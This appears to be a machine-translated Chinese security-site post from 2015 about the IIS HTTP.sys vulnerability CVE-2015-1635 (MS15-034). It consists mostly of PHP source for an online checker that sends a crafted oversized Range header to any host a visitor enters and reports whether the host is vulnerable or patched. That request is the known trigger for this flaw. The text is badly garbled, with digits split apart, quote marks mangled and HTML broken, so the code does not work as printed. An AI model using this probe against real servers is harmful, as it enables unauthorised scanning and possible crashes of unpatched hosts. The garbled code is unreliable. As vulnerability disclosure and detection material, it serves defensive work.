IIS the latest high-risk Vulnerability, CVE-2 0 1 5-1 6 3 5, AND MS15-0 3 4. THE POC and online detection of source-vulnerability warning-the black bar safety net

2015-04-16T00:00:00
ID MYHACK58:62201561261
Type myhack58
Reporter 佚名
Modified 2015-04-16T00:00:00

Description

! HTTP. sys remote code execution vulnerability, CVE-2 0 1 5-1 6 3 5, AND MS15-0 3 4. the A remote code execution vulnerability exists in the HTTP Protocol stack (HTTP.sys), when the HTTP.sys not correct parsing specially crafted HTTP request to cause this vulnerability. Successful exploitation of this vulnerability an attacker can be in the system account context in the execution of arbitrary code. https://technet.microsoft.com/zh-cn/library/security/MS15-034 Line detection source code ! php class VulnStatus { const FAIL = 0; const VULN = 1; const VULN_NOT_MS = 2; const PATCHED = 3; const NOT_VULN = 4; const NOT_VULN_MS = 5; const NOT_VULN_CF = 6; public static function AsString( $status, $host ) { switch( $status ) { case self::FAIL : return ';unable to connect to '; . $host . '; Test loophole.';; case self::VULN : return ';'; . $host . '; The presence of vulnerability.';; case self::VULN_NOT_MS: return ';'; . $host . '; There may be loopholes, but it seems to not use IIS.';; case self::PATCHED : return ';'; . $host . '; Has been repaired.';; case self::NOT_VULN : return ';can't identify the patch status '; . $host . ';, And not using IIS, there may be no loopholes.';; case self::NOT_VULN_MS: return ';can't identify the patch status '; . $host . ';. There may be no loopholes.';; case self::NOT_VULN_CF: return ';'; . $host . '; Possible use of the CloudFlare CDN acceleration, causes the vulnerability can not be detected or does not exist.';; } return ';as if broken.';; } } $host = false; $status = false; $url = filter_input( INPUT_GET, ';host';, FILTER_SANITIZE_URL ); if( ! empty( $url ) && parse_url( $url, PHP_URL_SCHEME ) === null ) { $url = ';http://'; . $url; } $port = parse_url( $url, PHP_URL_PORT ); if( $port === null ) { $port = 8 0; } $url = parse_url( $url, PHP_URL_HOST ); if( $url !== null ) { $cachekey = ';ms15034_'; . $url . ';_'; . $port; $cachetime = 3 0 0; // 5 minutes $host = htmlspecialchars( $url, ENT_HTML5 ); if( $port !== 8 0 ) { $host .= ';:'; . $port; } $memcached = new Memcached( ); $memcached->addServer( ';/var/run/memcached/memcached. sock';, 0 ); $status = $memcached->get( $cachekey ); if( $status === false ) { $fp = @fsockopen( $url, $port, $errno, $errstr, 5 ); if( $fp === false ) { $status = VulnStatus::FAIL; } else { stream_set_timeout( $fp, 5 ); $header = "GET / HTTP/1.1\r\n"; $header .= "Host: stuff\r\n"; $header .= "Range: bytes=0-18446744073709551615\r\n"; $header .= "Connection: close\r\n\r\n"; fwrite( $fp, $header ); $response = fread( $fp, 1 0 2 4 ); fclose( $fp ); if( strpos( $response, ';your request range does not meet'; ) !== false ) { $status = strpos( $response, ';Microsoft'; ) === false ? VulnStatus::VULN_NOT_MS : VulnStatus::VULN; } else if( strpos( $response, ';requests an invalid header head'; ) !== false ) { $cachetime = 3 6 0 0; // cache time $status = VulnStatus::PATCHED; } else if( strpos( $response, ';Microsoft'; ) === false ) { if( strpos( $response, ';4 0 3 Forbidden'; ) !== false && strpos( $response, ';cloudflare-nginx'; ) !== false ) { $status = VulnStatus::NOT_VULN_CF; } else { $status = VulnStatus::NOT_VULN; } } else { $status = VulnStatus::NOT_VULN_MS; } } unset( $fp, $header, $response ); $memcached->set( $cachekey, $status, $cachetime ); } $status = VulnStatus::AsString( $status, $host ); } ?& gt; charset="utf-8"> name="theme-color" content="#4 2 4 2 4 2"> http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> name="viewport" content="width=device-width, initial-scale=1.0"> MS15-0 3 4 Test href="//maxcdn.bootstrapcdn.com/bootstrap/3.3.4/css/bootstrap.min.css" rel="stylesheet"> type="text/css"> . container { max-width: 900px; } . masthead { position: relative; padding: 20px 0; text-align: center; color: #fff; background-color: #4 2 4 2 4 2; margin-bottom: 20px; } . masthead a { color: #fff; } . footer { text-align: center; padding: 15px; color: #5 5 5; } . footer span { color: #FA5994; } . form-inline { text-align: center; margin-bottom: 20px; } . github { position: absolute; top: 0; right: 0; } HTTP.sys stack vulnerability testing Enter a URL or a hostname to test the server href="https://technet.microsoft.com/en-us/library/security/ms15-034.aspx" target="_blank">MS15-0 3 4 / href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635" target="_blank">CVE-2 0 1 5-1 6 3 5.

[1] [2] next